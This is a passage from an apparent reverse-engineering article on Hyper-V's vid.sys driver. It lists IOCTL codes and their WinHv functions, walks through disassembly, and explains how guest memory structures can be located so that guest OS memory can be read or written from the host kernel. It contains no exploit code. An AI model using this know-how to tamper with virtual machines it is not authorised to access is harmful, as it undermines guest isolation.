<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x221174</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidPartitionIoctlSetup</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvCreatePartition</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x22117C</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetXsaveData</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x220003</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidPartitionIoctlPropertyGet</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetPartitionId, WinHvGetPartitionProperty</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x22122B</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VsmmVaGpaCoreGetGpaPageProperties</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VsmmVaGpaCorepGpnCompareFunctionByPage,</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VsmmNtSlatAccessFault</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x2210B7</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidVpIoctlStateGet</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetVpRegisters</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x221013</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAssertVirtualInterrupt</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x22105F</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VsmmDoorbellRemoveEntry</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidHandleTableFreeEntry</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x2210AF</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Get partition id from Prtn object</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x2210EF</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidVpLookup</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidVpSuspend, VidMessageSlotHandle, VidVpRun</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x22116F</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidPartitionIoctlPropertySet</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x22117B</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidVpIoctlStateSet</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetVpRegisters</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x2211A3</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VsmmExoTranslateGuestVirtualAddress</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvTranslateVirtualAddress</span></div>
</td></tr>
</tbody></table>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It corresponds to a limited set of functions provided by the WHVP API SDK. If a forbidden request is called, error code C0000002h will be returned.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As you can see, the functions of reading/writing memory are not available through WHVP API, so memory access using official API isn’t impossible. We need to go deeper into the vid.sys driver and consider the structure of the created memory blocks.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="268" src="https://lh6.googleusercontent.com/JWXnKSI3HPu9iQv9G4MWipJDcGvILgRf5oAPcQ2BBlc9hAJgjkyfJiiuuSBSI5cLKibEH1TFU8_AEctESRcbjjfn8Ct4ickVy3vdsj9NYG3zbprTtT-YSMUIdIlelGKG6FdWyJK8A-OrtMcxzw" style="margin-left: 0px; margin-top: 0px;" width="479" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Shortly (if you don’t want read previous article), VM_PROCESS_CONTEXT object is created for each virtual machine. Virtual machine memory is described with structures MEMORY_BLOCK and GPAR_OBJECT.</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For full VM, created through Hyper-V Manager, MEMORY_BLOCK structure contains a pointer to the guest OS GPA array, which maps the SPA host of the operating system, the GPA. Each MEMORY_BLOCK describes its own GPA range. Having found a specific block and obtained a GPA, you can execute the IoAllocateMdl and MmMapLockedPagesSpecifyCache functions and read / write data to the memory of the guest OS.</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When Hyper-V containers is started, a separate kernel mode vmmem process (minimal process) is created. VM_PROCESS_CONTEXT object contains reference to array of GPAR objects, that contains GPA and memory block’s offsets in the vmmem process. Guest memory is already mapped in vmmem process, and for reading/writing it is necessary to find the block, that describes the necessary GPA and read the corresponding memory block from the vmmem address space, for example, using the MmCopyVirtualMemory function built into the Windows kernel.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">EXO partitions have a different memory organization:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="250" src="https://lh5.googleusercontent.com/TdK_2q5hteCnc1xb3ZBq-uGgK1wPQo0eESRNSDTbY2uTYsj3c0ARnusuLrSrI6A684H3YtcllxH3LbRMcvf5aFI_O3GGC3K9blTAiYe8PiUV--z0up24kTqYTtTITHyUgvZxZJAEo5ZkmO9muA" style="margin-left: 0px; margin-top: 0px;" width="396" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Memory blocks mapping occurs through vid.sys!VsmmExoGpaRangeIoctlMap call, from which vid.sys!VsmmVaGpaCoreMapGpaRange is called.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">First we are interested in vid.sys!VsmmVaGpaCorepFindRange, which is called from vid.sys!VsmmVaGpaCorepCreateGpaToVaMappings, which provides pointers to two functions:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VsmmVaGpaCorepGpnCompareFunctionByPage:</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cmp rax, [rdx+40h] – upper GPA</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cmp rax, [rdx+38h] – lower GPA </span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VsmmVaGpaCorepVpnCompareFunctionByPage:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cmp rax, [rdx+20h] – upper vmmem memory boundary offset</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cmp rax, [rdx+18h] – lower vmmem memory boundary offset</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vid.sys!VsmmVaGpaCorepGpaRangeAllocate – allocates pool with size 0x70h bytes.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We see following code:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">lea rcx, [r13+57A0h]</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov rdx, rdi</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">call cs:__imp_RtlRbRemoveNode</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
